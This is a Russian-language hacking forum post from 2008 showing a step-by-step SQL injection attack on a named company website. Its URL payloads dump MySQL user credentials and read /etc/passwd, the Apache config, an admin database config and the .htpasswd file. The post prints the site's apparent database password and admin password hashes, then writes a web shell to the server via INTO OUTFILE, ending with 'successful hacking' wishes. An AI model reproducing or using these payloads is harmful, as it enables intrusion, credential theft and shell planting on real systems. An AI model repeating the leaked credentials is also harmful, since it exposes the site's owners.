07.12.2008, 23:10
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
d1aVOL
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,user,passw ord)))+from+mysql.user--
root
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/passwd%27)))+from+mysql.user+limit+0,1--
кавычки не фильтрует
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/httpd/conf/httpd.conf%27)))+from+mysql.user+limit+0,1--
узнаем пути и сайты на сервере )
<VirtualHost 72.3.131.57:80>
DocumentRoot /var/www/html
ServerName southworth.com
ServerAlias www.southworth.com ...
<Directory "/var/www/html">
allow from all
Options +Indexes
</Directory>
LogLevel emerg
CustomLog /var/log/httpd/sw_access_log combined
</VirtualHost>
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/bsinclude.inc%27)))+from+mysql.user+limit+0,1--
смотрим конфиг админки
$bshostname="localhost";
$bsusername="swdata";
$bspassword="dataB88";
$bsdatabase="southworthbs";
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/.htpasswd%27)))+from+mysql.user+limit+0,1--
ну и самое главное пароли к админке:
cservice:12gesqQWYvu66
sieraci:70X9knvrU05jc
southworth:WjEHl7rauDQhc
что за хеш?
http://www.southworth.com/page.php?id=-1+union+select+%27vital evil php%27+into+outfile+%27/var/www/html/images/main2/_notes/s.php%27--
ну и конешно залитие шелла ) токо папку на запись остается наити тебе )
усе успешного вам хека! 
Последний раз редактировалось sabe; 08.12.2008 в 00:20..
|
|
|